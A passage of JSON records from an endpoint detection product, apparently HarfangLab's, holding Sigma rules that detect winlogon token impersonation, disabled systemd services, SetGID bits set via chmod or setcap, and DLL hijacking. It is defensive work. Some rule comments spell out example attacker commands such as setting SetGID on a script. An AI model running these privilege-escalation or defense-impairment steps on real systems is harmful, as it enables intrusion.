classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n ProcessIntegrityLevel: 'High'\n TargetImage: '?:\\Windows\\System32\\winlogon.exe'\n GrantedAccessStr: \"PROCESS_DUP_HANDLE\"\n\n filter_microsoft:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_program_files:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_tokenbroker:\n TargetProcessCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -p -s TokenBroker'\n\n exclusion_freefilesync:\n ProcessProduct: 'FreeFileSync'\n ProcessSigned: 'true'\n ProcessSignature: 'Florian BAUER'\n\n exclusion_handle:\n ProcessOriginalFileName: 'Nthandle.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Sysinternals'\n\n exclusion_runtimebroker:\n ProcessImage: '?:\\Windows\\System32\\RuntimeBroker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_aomei:\n ProcessImage|endswith: '\\AmanCpFile.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AOMEI International Network Limited'\n\n exclusion_procexp:\n ProcessOriginalFileName: 'Procexp.exe'\n ProcessProduct: 'Process Explorer'\n ProcessCompany:\n - 'Sysinternals'\n - 'Sysinternals - www.sysinternals.com'\n\n exclusion_adobe:\n ProcessImage: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\CreativeCloudSet-Up.exe'\n ProcessParentImage: '?:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Desktop Common\\ElevationManager\\AdobeUpdateService.exe'\n\n exclusion_systracer:\n ProcessImage: '?:\\Program Files\\SysTracer\\SysTracer.exe'\n ProcessOriginalFileName: 'SysTracer.EXE'\n ProcessCompany: 'Blue Project Software'\n\n exclusion_perfmon:\n ProcessImage: '?:\\Windows\\System32\\perfmon.exe'\n CallTrace|contains: '|?:\\Windows\\System32\\KernelBase.dll+*|?:\\Windows\\System32\\wdc.dll+*|?:\\Windows\\System32\\wdc.dll+*|?:\\Windows\\System32\\kernel32.dll+*|'\n\n exclusion_dropbox:\n ProcessOriginalFileName: 'Dropbox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Dropbox, Inc'\n\n exclusion_eraser:\n ProcessOriginalFileName: 'Eraser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Heidi Computers Ltd'\n\n exclusion_ibm:\n # C:\\Program Files (x86)\\IBM\\Notes\\nsd.exe\n ProcessOriginalFileName: 'wnsd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'International Business Machines Corporation'\n\n exclusion_bitdefender:\n # C:\\Program Files\\Bitdefender\\Bitdefender Security App\\bdagent.exe\n ProcessOriginalFileName: 'bdagent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_mitel:\n ProcessImage|endswith: '*\\MitelManagerClient\\Update.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mitel France'\n\n exclusion_greenshot:\n ProcessOriginalFileName: 'Greenshot.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, Robin Krom'\n\n exclusion_multi_commander:\n ProcessImage: '?:\\Program Files\\MultiCommander (x64)\\MultiCommander.exe'\n ProcessOriginalFileName: 'MultiCommander.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ff2416a-e32c-45f4-b1ec-f1d61b14d607",
"rule_name": "Winlogon Access Token Impersonation Detected",
"rule_description": "Detects a suspicious attempt to elevate privileges to local SYSTEM via an access token impersonation of winlogon.exe.\nToken impersonation is a technique through which a Windows local administrator could steal another user's security token in order to impersonate and effectively execute commands as that user.\nIt is recommended to analyze the behavior and content of both the parent and the child processes to search for malicious actions.\n",
"rule_creation_date": "2024-04-19",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1134.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4030d3e4-9b06-4b18-a6a2-04f077cafbe5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.578321Z",
"creation_date": "2026-03-23T11:45:35.294424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294431Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1489/",
"https://attack.mitre.org/techniques/T1569/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1489_systemd_service_disabled.yml",
"content": "title: SystemD Service Disabled\nid: 4030d3e4-9b06-4b18-a6a2-04f077cafbe5\ndescription: |\n Detects when a systemd service is manually disabled.\n Adversaries may disable services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\n It is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\n Additionally, it is recommended to investigate the process responsible for the disabling of the service to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1489/\n - https://attack.mitre.org/techniques/T1569/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1489\n - attack.execution\n - attack.t1569\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/systemctl'\n CommandLine|contains: ' disable '\n ParentImage|contains: '?'\n\n filter_other_rules:\n CommandLine|contains:\n # This is handled by another other 4bad3446-0e5e-44b4-9fd5-3bb35c6d7625\n - 'ufw'\n - 'firewalld'\n # This is handled by another other 8ff98ac0-e971-4cd5-8393-79bb8a209cd3\n - 'rsyslog'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors: '|/usr/bin/dpkg|'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n - ProcessParentCommandLine: '/bin/sh /var/tmp/rpm-tmp.*'\n - ProcessGrandparentCommandLine: '/bin/sh /var/tmp/rpm-tmp.*'\n - ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_eset:\n - CommandLine: 'systemctl disable eraagent.service'\n CurrentDirectory: '/opt/eset/RemoteAdministrator/Agent/'\n - GrandparentImage: '/opt/eset/efs/lib/execd'\n\n exclusion_k3s:\n ProcessCommandLine: 'systemctl disable k3s-agent'\n\n exclusion_bitdefender_install:\n CommandLine|contains: 'bdsec-arrakis'\n ParentImage: '/usr/bin/??sh'\n ParentCommandLine|contains:\n - '/installer'\n - '/uninstall'\n - '/opt/bitdefender-security-tools/bin/'\n CurrentDirectory|contains: '/bitdefender'\n\n exclusion_fsecure:\n - ProcessParentImage|startswith: '/opt/f-secure/'\n - ProcessGrandparentImage|startswith: '/opt/f-secure/'\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_wazo_monit:\n ProcessCommandLine: 'systemctl disable monit'\n ProcessParentCommandLine: '/bin/bash /bin/wazo-service disable'\n\n exclusion_authconfig_nscd:\n ProcessCommandLine: '/bin/systemctl disable nscd.service'\n ProcessGrandparentCommandLine|startswith: '/usr/bin/python /sbin/authconfig '\n\n exclusion_manageengine:\n ProcessParentImage: '/usr/local/manageengine/uems_agent/bin/dcservice'\n\n exclusion_puppet:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n exclusion_azuremonitor:\n - CommandLine|startswith: 'systemctl disable azuremonitor'\n - CurrentDirectory|startswith: '/var/lib/waagent/Microsoft.'\n\n exclusion_bulkproxy:\n CommandLine|startswith: 'systemctl disable bulkproxy'\n\n exclusion_3cxpbx:\n Ancestors|endswith: '/usr/lib/3cxpbx/CloudServicesWatcher|/usr/lib/systemd/systemd'\n\n exclusion_cybereason:\n ProcessParentImage: '/opt/cybereason/sensor/bin/cybereason-sensor'\n\n exclusion_rancher:\n CommandLine:\n - 'systemctl disable rke2-agent'\n - 'systemctl disable rke2-server'\n - 'systemctl disable rancher-system-agent'\n ProcessParentCommandLine|endswith:\n - '/bin/sh */bin/rke2-uninstall.sh'\n - '/bin/sh */bin/rancher-system-agent-uninstall.sh'\n\n exclusion_listchanges:\n CommandLine: 'systemctl disable apt-listchanges.timer'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_trendmicro:\n ProcessParentImage: '/opt/TrendMicro/EndpointBasecamp/bin/tmxbc'\n\n exclusion_sme_server:\n CommandLine: 'systemctl disable ARID_entry'\n ParentCommandLine: '/usr/bin/perl -w /sbin/e-smith/signal-event.perl post-sync'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/microfocus/Discovery/.discagnt/udscan|'\n - '|/opt/VRTSvcs/bin/Script51Agent|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4030d3e4-9b06-4b18-a6a2-04f077cafbe5",
"rule_name": "SystemD Service Disabled",
"rule_description": "Detects when a systemd service is manually disabled.\nAdversaries may disable services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\nIt is recommended to ensure that both a legitimate administrator disabled this service and that the service is not critical.\nAdditionally, it is recommended to investigate the process responsible for the disabling of the service to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40584aef-d0d3-4764-9876-2e1f95ad821a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.601600Z",
"creation_date": "2026-03-23T11:45:34.095839Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095844Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_chmod_setgid_linux.yml",
"content": "title: SetGID Access Flag Set via chmod/setcap\nid: 40584aef-d0d3-4764-9876-2e1f95ad821a\ndescription: |\n Detects chmod and setcap being used to set the SetGID bit or capability on a file.\n Attackers can set the SetGID bit on a file to execute a it with a different (and potentially more privileged) group context.\n It is recommended to investigate the file having its characteristics modified, as well as potential executions of this file to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/09/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Chmod\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_chmod:\n # chmod +s /home/user/malicious_script.sh\n # chmod ug+s /home/user/malicious_script.sh\n # chmod g+s /home/user/malicious_script.sh\n # chmod 4644 /home/user/malicious_script.sh\n # chmod 6644 /home/user/malicious_script.sh\n Image|endswith: '/chmod'\n CommandLine|contains:\n - 'chmod +s'\n - 'chmod ug+s'\n - 'chmod g+s'\n - 'chmod 2??? '\n - 'chmod 6??? '\n selection_setcap:\n # setcap cap_setgid=pe /home/user/malicious_script.sh\n # setcap cap_setgid=e /home/user/malicious_script.sh\n # setcap cap_setgid=+pie /home/user/malicious_script.sh\n # setcap cap_net_bind_service,cap_setgid=pe /home/user/malicious_script.sh\n # setcap cap_setgid,cap_setuid=+pie /home/user/malicious_script.sh\n Image|endswith: '/setcap'\n CommandLine|contains: 'cap_setgid'\n\n selection_commandline:\n CommandLine|contains:\n - ' /home/'\n - ' /root/'\n - ' /opt/'\n - ' /bin/'\n - ' /sbin/'\n - ' /usr/bin/'\n - ' /usr/sbin/'\n - ' /tmp/'\n - ' /var/tmp/'\n - ' /run/'\n - ' /var/run/'\n - ' /dev/shm/'\n - ' /var/www/'\n\n selection_directory:\n CurrentDirectory|startswith:\n - '/home/'\n - '/root/'\n - '/opt/'\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/tmp/'\n - '/var/tmp/'\n - '/run/'\n - '/var/run/'\n - '/dev/shm/'\n - '/var/www/'\n\n filter_local_directory:\n CommandLine|contains: '/'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/usr/bin/rpm|'\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/containerd-shim-runc-v2|'\n\n exclusion_image:\n ParentImage:\n - '/usr/bin/find'\n - '/usr/bin/make'\n\n exclusion_dpkg:\n CommandLine|contains: 'chmod 2755 /usr/bin/ssh-agent'\n GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dnf:\n ParentCommandLine: '/bin/sh /var/tmp/rpm-tmp.*'\n GrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_postfix:\n - CommandLine:\n - 'chmod 2755 /usr/sbin/postqueue'\n - 'chmod 2555 /usr/sbin/postqueue'\n - 'chmod 2755 /usr/sbin/postdrop'\n - 'chmod 2555 /usr/sbin/postdrop'\n ParentCommandLine|startswith:\n - '/bin/sh /usr/lib/postfix/sbin/postfix-script set-permissions'\n - '/bin/sh /usr/lib/postfix/sbin/post-install create-missing set-permissions '\n - '/bin/sh /usr/libexec/postfix/sbin/postfix-script set-permissions'\n - '/bin/sh /usr/libexec/postfix/post-install create-missing set-permissions '\n - GrandparentCommandLine|startswith:\n - '/bin/sh /usr/lib/postfix/sbin/postfix-script set-permissions'\n - '/usr/bin/sh /usr/libexec/postfix/postfix-script set-permissions'\n\n exclusion_journal:\n CommandLine: 'chmod g+s /run/log/journal/ /run/log/journal/???????????????????????????????? /var/log/journal/ /var/log/journal/????????????????????????????????'\n GrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dpkg_config:\n ParentCommandLine: '/bin/sh /var/lib/dpkg/info/*.postinst configure*'\n\n exclusion_postgresql:\n CommandLine: 'chmod 2775 /var/run/postgresql'\n ParentCommandLine: '/bin/sh /etc/init.d/postgresql start'\n\n exclusion_isa:\n ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_bitdefender:\n CommandLine: 'chmod +s /opt/bitdefender-security-tools/bin/auctl'\n\n exclusion_var_www:\n CommandLine|startswith: 'chmod 2755 /var/www/'\n\n exclusion_xivo:\n GrandparentCommandLine|contains: '/sbin/xivo-fix-paths-rights'\n\n exclusion_parallel:\n CommandLine: '/usr/bin/perl /usr/bin/parallel -j 4 chmod 555 {}'\n\n exclusion_asterisk:\n - ParentCommandLine|startswith: 'find /var/lib/asterisk'\n - GrandparentCommandLine: '/bin/sh /usr/share/asterisk/bin/asterisk_fix'\n\n exclusion_resto:\n ParentCommandLine|startswith: 'find resto_full_43 -exec chmod '\n\n exclusion_convert2rhel:\n GrandparentCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: (selection_chmod or selection_setcap) and (selection_commandline or (selection_directory and not filter_local_directory)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "40584aef-d0d3-4764-9876-2e1f95ad821a",
"rule_name": "SetGID Access Flag Set via chmod/setcap",
"rule_description": "Detects chmod and setcap being used to set the SetGID bit or capability on a file.\nAttackers can set the SetGID bit on a file to execute a it with a different (and potentially more privileged) group context.\nIt is recommended to investigate the file having its characteristics modified, as well as potential executions of this file to determine if this action was legitimate.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "40aa4aee-13e6-4b99-b9bd-b4dd753c0115",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618918Z",
"creation_date": "2026-03-23T11:45:34.618920Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618925Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_k7tsvlog.yml",
"content": "title: DLL Hijacking via K7TSVlog.exe\nid: 40aa4aee-13e6-4b99-b9bd-b4dd753c0115\ndescription: |\n Detects potential Windows DLL Hijacking via K7TSVlog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - 